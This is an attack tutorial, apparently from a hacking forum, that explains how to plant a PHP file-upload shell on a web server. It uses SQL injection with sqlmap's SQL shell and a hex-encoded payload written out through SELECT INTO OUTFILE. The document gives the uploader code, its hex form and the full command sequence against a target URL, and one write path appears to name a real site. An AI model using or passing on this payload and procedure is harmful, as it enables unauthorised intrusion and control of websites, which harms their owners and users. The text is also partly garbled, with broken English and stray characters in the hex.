Upload shell via sqlmap

1. First we must have a target first course, example my target : http://www.example.com /index.php?id=1 2. prepare your uploader script, as below. PHP Code:
2.  
3.  
4. <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])."has been uploaded";}else{echo"Error!";}?>previously used to convert the above script into a hex gan before it can be uploaded, the results are as below Convert script Upload Hex -->http://www.string- functions.com/string-hex.aspx PHP Code: 3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d697422​2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f616465​6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e Next Open Your CMD C:\user\Security-Testers>cd c:\Sqlmap C:\Sqlmap>C:\Sqlmap>sqlmap.py -u http://www.example.com /index.php?id=1 --sql-shell would such as this : [15:35:06] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5 [15:35:06] [INFO] calling MySQL shell. To quit type'x'or'q'and press ENTER sql-shell>Now type SELECT 0x'Hex'INTO OUTFILE"PATH / filename"; Do not forget to add'0 x'in front of'HEX'0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974​222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164​656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e into"/home/siemens/public_html/upload.php"; wait and if lucky you will be notified successfully uploaded, if less fortunate so try again if it works please browse our files earlier, Http://www.example.com /upload.php next upload your files . Code: http://pastebin.com/JYcibww9